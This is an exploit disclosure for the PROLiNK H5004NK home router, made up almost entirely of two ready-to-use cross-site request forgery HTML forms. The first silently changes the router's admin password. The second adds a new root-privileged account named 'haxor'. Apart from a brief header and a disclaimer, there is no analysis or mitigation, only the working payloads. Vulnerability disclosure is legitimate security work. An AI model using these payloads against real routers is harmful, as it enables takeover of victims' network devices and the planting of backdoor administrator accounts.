# Exploit Title:  PROLiNK H5004NK Multiple Vulnerabilities
# Date: 16-04-2015
# Firmware: R76S Slt 4WNE1 6.1R 
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Disclaimer: Use this for educational purposes only!


#1| Admin Password Manipulation XSRF 
-----------------------------------------------------

<html>
  <body>
    <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="oldpass" value="password" />
      <input type="hidden" name="newpass" value="admin" />
      <input type="hidden" name="confpass" value="admin" />
      <input type="hidden" name="modify" value="Modify" />
      <input type="hidden" name="select" value="s0" />
      <input type="hidden" name="hiddenpass" value="password" />
      <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#2| Adding a New Root Account XSRF 
-----------------------------------------------------

<html>
  <body>
    <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
      <input type="hidden" name="username" value="haxor" />
      <input type="hidden" name="privilege" value="2" />
      <input type="hidden" name="newpass" value="123" />
      <input type="hidden" name="confpass" value="123" />
      <input type="hidden" name="adduser" value="Add" />
      <input type="hidden" name="hiddenpass" value="" />
      <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>